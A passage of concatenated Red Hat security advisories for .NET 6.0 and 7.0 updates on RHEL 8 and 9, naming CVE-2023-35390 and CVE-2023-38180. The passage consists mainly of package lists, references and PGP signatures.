dotnet-apphost-pack-6.0-debuginfo-6.0.21-1.el8_6.s390x.rpm  
dotnet-host-6.0.21-1.el8_6.s390x.rpm  
dotnet-host-debuginfo-6.0.21-1.el8_6.s390x.rpm  
dotnet-hostfxr-6.0-6.0.21-1.el8_6.s390x.rpm  
dotnet-hostfxr-6.0-debuginfo-6.0.21-1.el8_6.s390x.rpm  
dotnet-runtime-6.0-6.0.21-1.el8_6.s390x.rpm  
dotnet-runtime-6.0-debuginfo-6.0.21-1.el8_6.s390x.rpm  
dotnet-sdk-6.0-6.0.121-1.el8_6.s390x.rpm  
dotnet-sdk-6.0-debuginfo-6.0.121-1.el8_6.s390x.rpm  
dotnet-targeting-pack-6.0-6.0.21-1.el8_6.s390x.rpm  
dotnet-templates-6.0-6.0.121-1.el8_6.s390x.rpm  
dotnet6.0-debuginfo-6.0.121-1.el8_6.s390x.rpm  
dotnet6.0-debugsource-6.0.121-1.el8_6.s390x.rpm  
netstandard-targeting-pack-2.1-6.0.121-1.el8_6.s390x.rpm

x86_64:  
aspnetcore-runtime-6.0-6.0.21-1.el8_6.x86_64.rpm  
aspnetcore-targeting-pack-6.0-6.0.21-1.el8_6.x86_64.rpm  
dotnet-6.0.121-1.el8_6.x86_64.rpm  
dotnet-apphost-pack-6.0-6.0.21-1.el8_6.x86_64.rpm  
dotnet-apphost-pack-6.0-debuginfo-6.0.21-1.el8_6.x86_64.rpm  
dotnet-host-6.0.21-1.el8_6.x86_64.rpm  
dotnet-host-debuginfo-6.0.21-1.el8_6.x86_64.rpm  
dotnet-hostfxr-6.0-6.0.21-1.el8_6.x86_64.rpm  
dotnet-hostfxr-6.0-debuginfo-6.0.21-1.el8_6.x86_64.rpm  
dotnet-runtime-6.0-6.0.21-1.el8_6.x86_64.rpm  
dotnet-runtime-6.0-debuginfo-6.0.21-1.el8_6.x86_64.rpm  
dotnet-sdk-6.0-6.0.121-1.el8_6.x86_64.rpm  
dotnet-sdk-6.0-debuginfo-6.0.121-1.el8_6.x86_64.rpm  
dotnet-targeting-pack-6.0-6.0.21-1.el8_6.x86_64.rpm  
dotnet-templates-6.0-6.0.121-1.el8_6.x86_64.rpm  
dotnet6.0-debuginfo-6.0.121-1.el8_6.x86_64.rpm  
dotnet6.0-debugsource-6.0.121-1.el8_6.x86_64.rpm  
netstandard-targeting-pack-2.1-6.0.121-1.el8_6.x86_64.rpm

Red Hat CodeReady Linux Builder EUS (v.8.6):

aarch64:  
dotnet-apphost-pack-6.0-debuginfo-6.0.21-1.el8_6.aarch64.rpm  
dotnet-host-debuginfo-6.0.21-1.el8_6.aarch64.rpm  
dotnet-hostfxr-6.0-debuginfo-6.0.21-1.el8_6.aarch64.rpm  
dotnet-runtime-6.0-debuginfo-6.0.21-1.el8_6.aarch64.rpm  
dotnet-sdk-6.0-debuginfo-6.0.121-1.el8_6.aarch64.rpm  
dotnet-sdk-6.0-source-built-artifacts-6.0.121-1.el8_6.aarch64.rpm  
dotnet6.0-debuginfo-6.0.121-1.el8_6.aarch64.rpm  
dotnet6.0-debugsource-6.0.121-1.el8_6.aarch64.rpm

s390x:  
dotnet-apphost-pack-6.0-debuginfo-6.0.21-1.el8_6.s390x.rpm  
dotnet-host-debuginfo-6.0.21-1.el8_6.s390x.rpm  
dotnet-hostfxr-6.0-debuginfo-6.0.21-1.el8_6.s390x.rpm  
dotnet-runtime-6.0-debuginfo-6.0.21-1.el8_6.s390x.rpm  
dotnet-sdk-6.0-debuginfo-6.0.121-1.el8_6.s390x.rpm  
dotnet-sdk-6.0-source-built-artifacts-6.0.121-1.el8_6.s390x.rpm  
dotnet6.0-debuginfo-6.0.121-1.el8_6.s390x.rpm  
dotnet6.0-debugsource-6.0.121-1.el8_6.s390x.rpm

x86_64:  
dotnet-apphost-pack-6.0-debuginfo-6.0.21-1.el8_6.x86_64.rpm  
dotnet-host-debuginfo-6.0.21-1.el8_6.x86_64.rpm  
dotnet-hostfxr-6.0-debuginfo-6.0.21-1.el8_6.x86_64.rpm  
dotnet-runtime-6.0-debuginfo-6.0.21-1.el8_6.x86_64.rpm  
dotnet-sdk-6.0-debuginfo-6.0.121-1.el8_6.x86_64.rpm  
dotnet-sdk-6.0-source-built-artifacts-6.0.121-1.el8_6.x86_64.rpm  
dotnet6.0-debuginfo-6.0.121-1.el8_6.x86_64.rpm  
dotnet6.0-debugsource-6.0.121-1.el8_6.x86_64.rpm

These packages are GPG signed by Red Hat for security.  Our key and  
details on how to verify the signature are available from  
https://access.redhat.com/security/team/key/

7. References:

https://access.redhat.com/security/cve/CVE-2023-35390  
https://access.redhat.com/security/cve/CVE-2023-38180  
https://access.redhat.com/security/updates/classification/#important

8. Contact:

The Red Hat security contact is <secalert@redhat.com>. More contact  
details at https://access.redhat.com/security/team/contact/

Copyright 2023 Red Hat, Inc.  
-----BEGIN PGP SIGNATURE-----  
Version: GnuPG v1

iQIcBAEBCAAGBQJk2ozbAAoJENzjgjWX9erEN6AP/iHfrvP5Mw/6WvdWKt/kHXVs  
l6OrQjDEYSPxvKKZI83eLLPgX35G8LBv1/YurHABQWMgDZV8peNRxcfDA+yVIgff  
s69pS3gQE+cBZw9StLpB2JkWuV8J2PWWDtVmmwj/T4Quun6mUu2I4AJnsu0BO/tk  
yhDQCJi3Tw+kjElTm92en1fFbhqk4tB5MC45EMoe1VjIzU75pzaCIqxwPiHnGf1l  
7Rb/hx1k0ZD5gVLncH4jUdUddHxJDBpDHQcyKPt9/blTB7Blkxk/kvoT3sJxogAP  
xJPEH7LZxmL56BRUsnQBJJRsQpkgZoSkTfS7qsQ2xLMNMmdFLlHXLvWdj+hRtAXd  
iwpDz8ab/BO39oYK9wFfhRjd85ERVyUQ0DlzfGhS40CVNeEX7om3AzZQzK3oPUvY  
DSqpCHEwiAJeKbp0Mjevak1GHQ0ykJFZiiA2pjfqHRMrBQz6b6PBotAQ4Dx3nXCj  
lei0uSHKFrpHzO0Her2wXmz8QXGx/2fVXDFJ88CwjBdZUyuhSMjxzUMrbhW6pyQn  
nlwCgmWm16ZM+9jLN0xFdOO/ECFNJdxzO+d1mXtu50YaB61UfvWyM04hEf5X+KJJ  
ib/tDROv+pdyyGUjRbnTJIovDOmMrzyjqDi44kC9Ckdgh+c65DGt26UW9gWCdVwg  
guZbZbpO/9ptFvo624NV  
=UbUV  
-----END PGP SIGNATURE-----  
--  
RHSA-announce mailing list  
RHSA-announce@redhat.com  
https://listman.redhat.com/mailman/listinfo/rhsa-announce

Red Hat Security Advisory 2023-4640-01

Red Hat Security Advisory 2023-4645-01 - .NET is a managed-software framework. It implements a subset of the .NET framework APIs and several new APIs, and it includes a CLR implementation. New versions of .NET that address a security vulnerability are now available. The updated versions are .NET SDK 6.0.121 and .NET Runtime 6.0.21. Issues addressed include a denial of service vulnerability.

-----BEGIN PGP SIGNED MESSAGE-----  
Hash: SHA256

=====================================================================  
                   Red Hat Security Advisory

Synopsis:          Important: .NET 6.0 security, bug fix, and enhancement update  
Advisory ID:       RHSA-2023:4645-01  
Product:           Red Hat Enterprise Linux  
Advisory URL:      https://access.redhat.com/errata/RHSA-2023:4645  
Issue date:        2023-08-14  
CVE Names:         CVE-2023-35390 CVE-2023-38180   
=====================================================================

1. Summary:

An update for .NET 6.0 is now available for Red Hat Enterprise Linux 8.

Red Hat Product Security has rated this update as having a security impact  
of Important. A Common Vulnerability Scoring System (CVSS) base score,  
which gives a detailed severity rating, is available for each vulnerability  
from the CVE link(s) in the References section.

2. Relevant releases/architectures:

Red Hat Enterprise Linux AppStream (v. 8) - aarch64, s390x, x86_64  
Red Hat Enterprise Linux CRB (v. 8) - aarch64, s390x, x86_64

3. Description:

.NET is a managed-software framework. It implements a subset of the .NET  
framework APIs and several new APIs, and it includes a CLR implementation.

New versions of .NET that address a security vulnerability are now  
available. The updated versions are .NET SDK 6.0.121 and .NET Runtime  
6.0.21.

Security Fix(es):

* dotnet: RCE under dotnet commands (CVE-2023-35390)

* dotnet: Kestrel vulnerability to slow read attacks leading to Denial of  
Service attack (CVE-2023-38180)

For more details about the security issue(s), including the impact, a CVSS  
score, acknowledgments, and other related information, refer to the CVE  
page(s) listed in the References section.

4. Solution:

For details on how to apply this update, which includes the changes  
described in this advisory, refer to:

https://access.redhat.com/articles/11258

5. Bugs fixed (https://bugzilla.redhat.com/):

2228621 - CVE-2023-38180 dotnet: Kestrel vulnerability to slow read attacks leading to Denial of Service attack  
2228622 - CVE-2023-35390 dotnet: RCE under dotnet commands

6. Package List:

Red Hat Enterprise Linux AppStream (v. 8):

Source:  
dotnet6.0-6.0.121-1.el8_8.src.rpm

aarch64:  
aspnetcore-runtime-6.0-6.0.21-1.el8_8.aarch64.rpm  
aspnetcore-targeting-pack-6.0-6.0.21-1.el8_8.aarch64.rpm  
dotnet-apphost-pack-6.0-6.0.21-1.el8_8.aarch64.rpm  
dotnet-apphost-pack-6.0-debuginfo-6.0.21-1.el8_8.aarch64.rpm  
dotnet-hostfxr-6.0-6.0.21-1.el8_8.aarch64.rpm  
dotnet-hostfxr-6.0-debuginfo-6.0.21-1.el8_8.aarch64.rpm  
dotnet-runtime-6.0-6.0.21-1.el8_8.aarch64.rpm  
dotnet-runtime-6.0-debuginfo-6.0.21-1.el8_8.aarch64.rpm  
dotnet-sdk-6.0-6.0.121-1.el8_8.aarch64.rpm  
dotnet-sdk-6.0-debuginfo-6.0.121-1.el8_8.aarch64.rpm  
dotnet-targeting-pack-6.0-6.0.21-1.el8_8.aarch64.rpm  
dotnet-templates-6.0-6.0.121-1.el8_8.aarch64.rpm  
dotnet6.0-debuginfo-6.0.121-1.el8_8.aarch64.rpm  
dotnet6.0-debugsource-6.0.121-1.el8_8.aarch64.rpm

s390x:  
aspnetcore-runtime-6.0-6.0.21-1.el8_8.s390x.rpm  
aspnetcore-targeting-pack-6.0-6.0.21-1.el8_8.s390x.rpm  
dotnet-apphost-pack-6.0-6.0.21-1.el8_8.s390x.rpm  
dotnet-apphost-pack-6.0-debuginfo-6.0.21-1.el8_8.s390x.rpm  
dotnet-hostfxr-6.0-6.0.21-1.el8_8.s390x.rpm  
dotnet-hostfxr-6.0-debuginfo-6.0.21-1.el8_8.s390x.rpm  
dotnet-runtime-6.0-6.0.21-1.el8_8.s390x.rpm  
dotnet-runtime-6.0-debuginfo-6.0.21-1.el8_8.s390x.rpm  
dotnet-sdk-6.0-6.0.121-1.el8_8.s390x.rpm  
dotnet-sdk-6.0-debuginfo-6.0.121-1.el8_8.s390x.rpm  
dotnet-targeting-pack-6.0-6.0.21-1.el8_8.s390x.rpm  
dotnet-templates-6.0-6.0.121-1.el8_8.s390x.rpm  
dotnet6.0-debuginfo-6.0.121-1.el8_8.s390x.rpm  
dotnet6.0-debugsource-6.0.121-1.el8_8.s390x.rpm

x86_64:  
aspnetcore-runtime-6.0-6.0.21-1.el8_8.x86_64.rpm  
aspnetcore-targeting-pack-6.0-6.0.21-1.el8_8.x86_64.rpm  
dotnet-apphost-pack-6.0-6.0.21-1.el8_8.x86_64.rpm  
dotnet-apphost-pack-6.0-debuginfo-6.0.21-1.el8_8.x86_64.rpm  
dotnet-hostfxr-6.0-6.0.21-1.el8_8.x86_64.rpm  
dotnet-hostfxr-6.0-debuginfo-6.0.21-1.el8_8.x86_64.rpm  
dotnet-runtime-6.0-6.0.21-1.el8_8.x86_64.rpm  
dotnet-runtime-6.0-debuginfo-6.0.21-1.el8_8.x86_64.rpm  
dotnet-sdk-6.0-6.0.121-1.el8_8.x86_64.rpm  
dotnet-sdk-6.0-debuginfo-6.0.121-1.el8_8.x86_64.rpm  
dotnet-targeting-pack-6.0-6.0.21-1.el8_8.x86_64.rpm  
dotnet-templates-6.0-6.0.121-1.el8_8.x86_64.rpm  
dotnet6.0-debuginfo-6.0.121-1.el8_8.x86_64.rpm  
dotnet6.0-debugsource-6.0.121-1.el8_8.x86_64.rpm

Red Hat Enterprise Linux CRB (v. 8):

aarch64:  
dotnet-apphost-pack-6.0-debuginfo-6.0.21-1.el8_8.aarch64.rpm  
dotnet-hostfxr-6.0-debuginfo-6.0.21-1.el8_8.aarch64.rpm  
dotnet-runtime-6.0-debuginfo-6.0.21-1.el8_8.aarch64.rpm  
dotnet-sdk-6.0-debuginfo-6.0.121-1.el8_8.aarch64.rpm  
dotnet-sdk-6.0-source-built-artifacts-6.0.121-1.el8_8.aarch64.rpm  
dotnet6.0-debuginfo-6.0.121-1.el8_8.aarch64.rpm  
dotnet6.0-debugsource-6.0.121-1.el8_8.aarch64.rpm

s390x:  
dotnet-apphost-pack-6.0-debuginfo-6.0.21-1.el8_8.s390x.rpm  
dotnet-hostfxr-6.0-debuginfo-6.0.21-1.el8_8.s390x.rpm  
dotnet-runtime-6.0-debuginfo-6.0.21-1.el8_8.s390x.rpm  
dotnet-sdk-6.0-debuginfo-6.0.121-1.el8_8.s390x.rpm  
dotnet-sdk-6.0-source-built-artifacts-6.0.121-1.el8_8.s390x.rpm  
dotnet6.0-debuginfo-6.0.121-1.el8_8.s390x.rpm  
dotnet6.0-debugsource-6.0.121-1.el8_8.s390x.rpm

x86_64:  
dotnet-apphost-pack-6.0-debuginfo-6.0.21-1.el8_8.x86_64.rpm  
dotnet-hostfxr-6.0-debuginfo-6.0.21-1.el8_8.x86_64.rpm  
dotnet-runtime-6.0-debuginfo-6.0.21-1.el8_8.x86_64.rpm  
dotnet-sdk-6.0-debuginfo-6.0.121-1.el8_8.x86_64.rpm  
dotnet-sdk-6.0-source-built-artifacts-6.0.121-1.el8_8.x86_64.rpm  
dotnet6.0-debuginfo-6.0.121-1.el8_8.x86_64.rpm  
dotnet6.0-debugsource-6.0.121-1.el8_8.x86_64.rpm

These packages are GPG signed by Red Hat for security.  Our key and  
details on how to verify the signature are available from  
https://access.redhat.com/security/team/key/

7. References:

https://access.redhat.com/security/cve/CVE-2023-35390  
https://access.redhat.com/security/cve/CVE-2023-38180  
https://access.redhat.com/security/updates/classification/#important

8. Contact:

The Red Hat security contact is <secalert@redhat.com>. More contact  
details at https://access.redhat.com/security/team/contact/

Copyright 2023 Red Hat, Inc.  
-----BEGIN PGP SIGNATURE-----  
Version: GnuPG v1

iQIcBAEBCAAGBQJk2ozWAAoJENzjgjWX9erEcakP/0TCbUxDtqrW6Sc4wU0PxnxV  
ryjwuFmt+iWjDRKtF1vyEVJqfjfPWBjrUDr0Qt6E0XPMvpfPXIOK3ECW9ebljBeP  
NfvywpZbCcW2sn8qry66W8yGQg0hlZYkca3g94lohxsTG83sSt61I9Ko6veZRSfK  
d0GwshytYjN972v3LKoMd+gLhpNcbHVZIV+/TAd6DfbzDBQqGQqf3mCiTi1qTHWy  
0VFh/0q8TaALAdUEA7Bs6VB38qWBJpeG3ig9ikLkaQfEQw0FXC5zN0zQuSWZQmde  
pXu4h5boxf1IIHFJV2DPPBzUs+zuwAfPuS+3l3L78r/Y7nHbWoENOHxNq1iJ4Fd7  
w/1d7uNQXjI/MJxDLBYgBhUa85CBHs2+jeVg+mbEd0cQJiemLsB438RPHsHKBUJx  
R9bbrlbioAbUligCCoXPFnwXkB38ptY+KgWArda8ag2SKYPNaQcDPsN99SyNSni1  
RoDTYzGtECgOr/CyEli72sB7DfDNZjRz+vnQAo8Di4imyjch1Ybvk5DYW4lfzjhE  
9gz/DKtOm38xc/gDz3BFeXQ1Q6oL/K2hVBezmuYlXy22SSZYTBksuEqmz5hOc1V1  
1irGbX/IncZdDzmXg9cF2Hp7MT5sQUM6Y9U24xaqEbNdR9zYQz2h70TYIR50S+5a  
xPr9Ji97EZvhw8B6ugjo  
=bRge  
-----END PGP SIGNATURE-----  
--  
RHSA-announce mailing list  
RHSA-announce@redhat.com  
https://listman.redhat.com/mailman/listinfo/rhsa-announce

Red Hat Security Advisory 2023-4645-01

Red Hat Security Advisory 2023-4643-01 - .NET is a managed-software framework. It implements a subset of the .NET framework APIs and several new APIs, and it includes a CLR implementation. New versions of .NET that address a security vulnerability are now available. The updated versions are .NET SDK 7.0.110 and .NET Runtime 7.0.10. Issues addressed include a denial of service vulnerability.

-----BEGIN PGP SIGNED MESSAGE-----  
Hash: SHA256

=====================================================================  
                   Red Hat Security Advisory

Synopsis:          Important: .NET 7.0 security, bug fix, and enhancement update  
Advisory ID:       RHSA-2023:4643-01  
Product:           Red Hat Enterprise Linux  
Advisory URL:      https://access.redhat.com/errata/RHSA-2023:4643  
Issue date:        2023-08-14  
CVE Names:         CVE-2023-35390 CVE-2023-38180   
=====================================================================

1. Summary:

An update for .NET 7.0 is now available for Red Hat Enterprise Linux 8.

Red Hat Product Security has rated this update as having a security impact  
of Important. A Common Vulnerability Scoring System (CVSS) base score,  
which gives a detailed severity rating, is available for each vulnerability  
from the CVE link(s) in the References section.

2. Relevant releases/architectures:

Red Hat Enterprise Linux AppStream (v. 8) - aarch64, ppc64le, s390x, x86_64  
Red Hat Enterprise Linux CRB (v. 8) - aarch64, ppc64le, s390x, x86_64

3. Description:

.NET is a managed-software framework. It implements a subset of the .NET  
framework APIs and several new APIs, and it includes a CLR implementation.

New versions of .NET that address a security vulnerability are now  
available. The updated versions are .NET SDK 7.0.110 and .NET Runtime  
7.0.10.

Security Fix(es):

* dotnet: RCE under dotnet commands (CVE-2023-35390)

* dotnet: Kestrel vulnerability to slow read attacks leading to Denial of  
Service attack (CVE-2023-38180)

For more details about the security issue(s), including the impact, a CVSS  
score, acknowledgments, and other related information, refer to the CVE  
page(s) listed in the References section.

4. Solution:

For details on how to apply this update, which includes the changes  
described in this advisory, refer to:

https://access.redhat.com/articles/11258

5. Bugs fixed (https://bugzilla.redhat.com/):

2228621 - CVE-2023-38180 dotnet: Kestrel vulnerability to slow read attacks leading to Denial of Service attack  
2228622 - CVE-2023-35390 dotnet: RCE under dotnet commands

6. Package List:

Red Hat Enterprise Linux AppStream (v. 8):

Source:  
dotnet7.0-7.0.110-1.el8_8.src.rpm

aarch64:  
aspnetcore-runtime-7.0-7.0.10-1.el8_8.aarch64.rpm  
aspnetcore-targeting-pack-7.0-7.0.10-1.el8_8.aarch64.rpm  
dotnet-7.0.110-1.el8_8.aarch64.rpm  
dotnet-apphost-pack-7.0-7.0.10-1.el8_8.aarch64.rpm  
dotnet-apphost-pack-7.0-debuginfo-7.0.10-1.el8_8.aarch64.rpm  
dotnet-host-7.0.10-1.el8_8.aarch64.rpm  
dotnet-host-debuginfo-7.0.10-1.el8_8.aarch64.rpm  
dotnet-hostfxr-7.0-7.0.10-1.el8_8.aarch64.rpm  
dotnet-hostfxr-7.0-debuginfo-7.0.10-1.el8_8.aarch64.rpm  
dotnet-runtime-7.0-7.0.10-1.el8_8.aarch64.rpm  
dotnet-runtime-7.0-debuginfo-7.0.10-1.el8_8.aarch64.rpm  
dotnet-sdk-7.0-7.0.110-1.el8_8.aarch64.rpm  
dotnet-sdk-7.0-debuginfo-7.0.110-1.el8_8.aarch64.rpm  
dotnet-targeting-pack-7.0-7.0.10-1.el8_8.aarch64.rpm  
dotnet-templates-7.0-7.0.110-1.el8_8.aarch64.rpm  
dotnet7.0-debuginfo-7.0.110-1.el8_8.aarch64.rpm  
dotnet7.0-debugsource-7.0.110-1.el8_8.aarch64.rpm  
netstandard-targeting-pack-2.1-7.0.110-1.el8_8.aarch64.rpm

ppc64le:  
aspnetcore-runtime-7.0-7.0.10-1.el8_8.ppc64le.rpm  
aspnetcore-targeting-pack-7.0-7.0.10-1.el8_8.ppc64le.rpm  
dotnet-7.0.110-1.el8_8.ppc64le.rpm  
dotnet-apphost-pack-7.0-7.0.10-1.el8_8.ppc64le.rpm  
dotnet-apphost-pack-7.0-debuginfo-7.0.10-1.el8_8.ppc64le.rpm  
dotnet-host-7.0.10-1.el8_8.ppc64le.rpm  
dotnet-host-debuginfo-7.0.10-1.el8_8.ppc64le.rpm  
dotnet-hostfxr-7.0-7.0.10-1.el8_8.ppc64le.rpm  
dotnet-hostfxr-7.0-debuginfo-7.0.10-1.el8_8.ppc64le.rpm  
dotnet-runtime-7.0-7.0.10-1.el8_8.ppc64le.rpm  
dotnet-runtime-7.0-debuginfo-7.0.10-1.el8_8.ppc64le.rpm  
dotnet-sdk-7.0-7.0.110-1.el8_8.ppc64le.rpm  
dotnet-sdk-7.0-debuginfo-7.0.110-1.el8_8.ppc64le.rpm  
dotnet-targeting-pack-7.0-7.0.10-1.el8_8.ppc64le.rpm  
dotnet-templates-7.0-7.0.110-1.el8_8.ppc64le.rpm  
dotnet7.0-debuginfo-7.0.110-1.el8_8.ppc64le.rpm  
dotnet7.0-debugsource-7.0.110-1.el8_8.ppc64le.rpm  
netstandard-targeting-pack-2.1-7.0.110-1.el8_8.ppc64le.rpm

s390x:  
aspnetcore-runtime-7.0-7.0.10-1.el8_8.s390x.rpm  
aspnetcore-targeting-pack-7.0-7.0.10-1.el8_8.s390x.rpm  
dotnet-7.0.110-1.el8_8.s390x.rpm  
dotnet-apphost-pack-7.0-7.0.10-1.el8_8.s390x.rpm  
dotnet-apphost-pack-7.0-debuginfo-7.0.10-1.el8_8.s390x.rpm  
dotnet-host-7.0.10-1.el8_8.s390x.rpm  
dotnet-host-debuginfo-7.0.10-1.el8_8.s390x.rpm  
dotnet-hostfxr-7.0-7.0.10-1.el8_8.s390x.rpm  
dotnet-hostfxr-7.0-debuginfo-7.0.10-1.el8_8.s390x.rpm  
dotnet-runtime-7.0-7.0.10-1.el8_8.s390x.rpm  
dotnet-runtime-7.0-debuginfo-7.0.10-1.el8_8.s390x.rpm  
dotnet-sdk-7.0-7.0.110-1.el8_8.s390x.rpm  
dotnet-sdk-7.0-debuginfo-7.0.110-1.el8_8.s390x.rpm  
dotnet-targeting-pack-7.0-7.0.10-1.el8_8.s390x.rpm  
dotnet-templates-7.0-7.0.110-1.el8_8.s390x.rpm  
dotnet7.0-debuginfo-7.0.110-1.el8_8.s390x.rpm  
dotnet7.0-debugsource-7.0.110-1.el8_8.s390x.rpm  
netstandard-targeting-pack-2.1-7.0.110-1.el8_8.s390x.rpm

x86_64:  
aspnetcore-runtime-7.0-7.0.10-1.el8_8.x86_64.rpm  
aspnetcore-targeting-pack-7.0-7.0.10-1.el8_8.x86_64.rpm  
dotnet-7.0.110-1.el8_8.x86_64.rpm  
dotnet-apphost-pack-7.0-7.0.10-1.el8_8.x86_64.rpm  
dotnet-apphost-pack-7.0-debuginfo-7.0.10-1.el8_8.x86_64.rpm  
dotnet-host-7.0.10-1.el8_8.x86_64.rpm  
dotnet-host-debuginfo-7.0.10-1.el8_8.x86_64.rpm  
dotnet-hostfxr-7.0-7.0.10-1.el8_8.x86_64.rpm  
dotnet-hostfxr-7.0-debuginfo-7.0.10-1.el8_8.x86_64.rpm  
dotnet-runtime-7.0-7.0.10-1.el8_8.x86_64.rpm  
dotnet-runtime-7.0-debuginfo-7.0.10-1.el8_8.x86_64.rpm  
dotnet-sdk-7.0-7.0.110-1.el8_8.x86_64.rpm  
dotnet-sdk-7.0-debuginfo-7.0.110-1.el8_8.x86_64.rpm  
dotnet-targeting-pack-7.0-7.0.10-1.el8_8.x86_64.rpm  
dotnet-templates-7.0-7.0.110-1.el8_8.x86_64.rpm  
dotnet7.0-debuginfo-7.0.110-1.el8_8.x86_64.rpm  
dotnet7.0-debugsource-7.0.110-1.el8_8.x86_64.rpm  
netstandard-targeting-pack-2.1-7.0.110-1.el8_8.x86_64.rpm

Red Hat Enterprise Linux CRB (v. 8):

aarch64:  
dotnet-apphost-pack-7.0-debuginfo-7.0.10-1.el8_8.aarch64.rpm  
dotnet-host-debuginfo-7.0.10-1.el8_8.aarch64.rpm  
dotnet-hostfxr-7.0-debuginfo-7.0.10-1.el8_8.aarch64.rpm  
dotnet-runtime-7.0-debuginfo-7.0.10-1.el8_8.aarch64.rpm  
dotnet-sdk-7.0-debuginfo-7.0.110-1.el8_8.aarch64.rpm  
dotnet-sdk-7.0-source-built-artifacts-7.0.110-1.el8_8.aarch64.rpm  
dotnet7.0-debuginfo-7.0.110-1.el8_8.aarch64.rpm  
dotnet7.0-debugsource-7.0.110-1.el8_8.aarch64.rpm

ppc64le:  
dotnet-apphost-pack-7.0-debuginfo-7.0.10-1.el8_8.ppc64le.rpm  
dotnet-host-debuginfo-7.0.10-1.el8_8.ppc64le.rpm  
dotnet-hostfxr-7.0-debuginfo-7.0.10-1.el8_8.ppc64le.rpm  
dotnet-runtime-7.0-debuginfo-7.0.10-1.el8_8.ppc64le.rpm  
dotnet-sdk-7.0-debuginfo-7.0.110-1.el8_8.ppc64le.rpm  
dotnet-sdk-7.0-source-built-artifacts-7.0.110-1.el8_8.ppc64le.rpm  
dotnet7.0-debuginfo-7.0.110-1.el8_8.ppc64le.rpm  
dotnet7.0-debugsource-7.0.110-1.el8_8.ppc64le.rpm

s390x:  
dotnet-apphost-pack-7.0-debuginfo-7.0.10-1.el8_8.s390x.rpm  
dotnet-host-debuginfo-7.0.10-1.el8_8.s390x.rpm  
dotnet-hostfxr-7.0-debuginfo-7.0.10-1.el8_8.s390x.rpm  
dotnet-runtime-7.0-debuginfo-7.0.10-1.el8_8.s390x.rpm  
dotnet-sdk-7.0-debuginfo-7.0.110-1.el8_8.s390x.rpm  
dotnet-sdk-7.0-source-built-artifacts-7.0.110-1.el8_8.s390x.rpm  
dotnet7.0-debuginfo-7.0.110-1.el8_8.s390x.rpm  
dotnet7.0-debugsource-7.0.110-1.el8_8.s390x.rpm

x86_64:  
dotnet-apphost-pack-7.0-debuginfo-7.0.10-1.el8_8.x86_64.rpm  
dotnet-host-debuginfo-7.0.10-1.el8_8.x86_64.rpm  
dotnet-hostfxr-7.0-debuginfo-7.0.10-1.el8_8.x86_64.rpm  
dotnet-runtime-7.0-debuginfo-7.0.10-1.el8_8.x86_64.rpm  
dotnet-sdk-7.0-debuginfo-7.0.110-1.el8_8.x86_64.rpm  
dotnet-sdk-7.0-source-built-artifacts-7.0.110-1.el8_8.x86_64.rpm  
dotnet7.0-debuginfo-7.0.110-1.el8_8.x86_64.rpm  
dotnet7.0-debugsource-7.0.110-1.el8_8.x86_64.rpm

These packages are GPG signed by Red Hat for security.  Our key and  
details on how to verify the signature are available from  
https://access.redhat.com/security/team/key/

7. References:

https://access.redhat.com/security/cve/CVE-2023-35390  
https://access.redhat.com/security/cve/CVE-2023-38180  
https://access.redhat.com/security/updates/classification/#important

8. Contact:

The Red Hat security contact is <secalert@redhat.com>. More contact  
details at https://access.redhat.com/security/team/contact/

Copyright 2023 Red Hat, Inc.  
-----BEGIN PGP SIGNATURE-----  
Version: GnuPG v1

iQIcBAEBCAAGBQJk2oy6AAoJENzjgjWX9erEjeAP/iLDSy13Bn4eWSwgaBrF7OCe  
MknMYGPt3wLsS+WJ/UeLoFV/rQT2o+r1ZZPtpuATWP25sGmPtiSvDMfttWEevFbi  
Vu1wi/RHTgEd7iJ0RiVDLyRuS1fsUj5vqORYgvu+FFIy/gTmrV2SWenxKCadiBBe  
uXKU/L8QUtnGMKDGHtEqpt0B3XEKsYG+nB72um83RegEM+R3uPRYdJw4V7lgL85W  
O9/Rrq6BexhQ2ChWxAS7qzOxk3Q/iW80hRB0HNu7ljNlWXYEpkGKUXmrPvjFGAX4  
UKPD0tLUVopcGId1drzRUNp4uRPGX8MILwQfgwZVkfK4k9wYEyck8GnbRCGzZYtz  
TfA4DYI30rVkqvcc4oJCP9hnV09KpfzWNNyqcn6876V4j+1tBwveVTDApsLbCwYa  
+naFV4E/kR0RP0XBL20Eu9paHIyVcSiW4QPUrgtW7v7wGVH6fM5Jlb84apnjsck+  
LF76uuZNO2dVQPlokYh1VFzLHdOJiKBndQ0UY6XAd/RG/08V3+UmTECf2ghS+viJ  
rL3FqvDX4uTMBjehCom/hYNux7+iuCxSl8y2rYAKcBlu/qe53CpZbxEZjIZdZz/2  
Wa7oaygnxkeuCNlKZgoNm9l6/Nh2JzmWTqboZXy8vDH5K0CQIKHhuo09FC5+ZONw  
TK47hhUufwD66+TPMtNt  
=8QYr  
-----END PGP SIGNATURE-----  
--  
RHSA-announce mailing list  
RHSA-announce@redhat.com  
https://listman.redhat.com/mailman/listinfo/rhsa-announce

Red Hat Security Advisory 2023-4643-01

Red Hat Security Advisory 2023-4639-01 - .NET is a managed-software framework. It implements a subset of the .NET framework APIs and several new APIs, and it includes a CLR implementation. Issues addressed include a denial of service vulnerability.

-----BEGIN PGP SIGNED MESSAGE-----  
Hash: SHA256

=====================================================================  
                   Red Hat Security Advisory

Synopsis:          Important: .NET 6.0 security update  
Advisory ID:       RHSA-2023:4639-01  
Product:           Red Hat Enterprise Linux  
Advisory URL:      https://access.redhat.com/errata/RHSA-2023:4639  
Issue date:        2023-08-14  
CVE Names:         CVE-2023-35390 CVE-2023-38180   
=====================================================================

1. Summary:

An update for .NET 6.0 is now available for Red Hat Enterprise Linux 9.0  
Extended Update Support.

Red Hat Product Security has rated this update as having a security impact  
of Important. A Common Vulnerability Scoring System (CVSS) base score,  
which gives a detailed severity rating, is available for each vulnerability  
from the CVE link(s) in the References section.

2. Relevant releases/architectures:

Red Hat CodeReady Linux Builder EUS (v.9.0) - aarch64, s390x, x86_64  
Red Hat Enterprise Linux AppStream EUS (v.9.0) - aarch64, s390x, x86_64

3. Description:

.NET is a managed-software framework. It implements a subset of the .NET  
framework APIs and several new APIs, and it includes a CLR implementation.

Security Fix(es):

* dotnet: RCE under dotnet commands (CVE-2023-35390)

* dotnet: Kestrel vulnerability to slow read attacks leading to Denial of  
Service attack (CVE-2023-38180)

For more details about the security issue(s), including the impact, a CVSS  
score, acknowledgments, and other related information, refer to the CVE  
page(s) listed in the References section.

4. Solution:

For details on how to apply this update, which includes the changes  
described in this advisory, refer to:

https://access.redhat.com/articles/11258

5. Bugs fixed (https://bugzilla.redhat.com/):

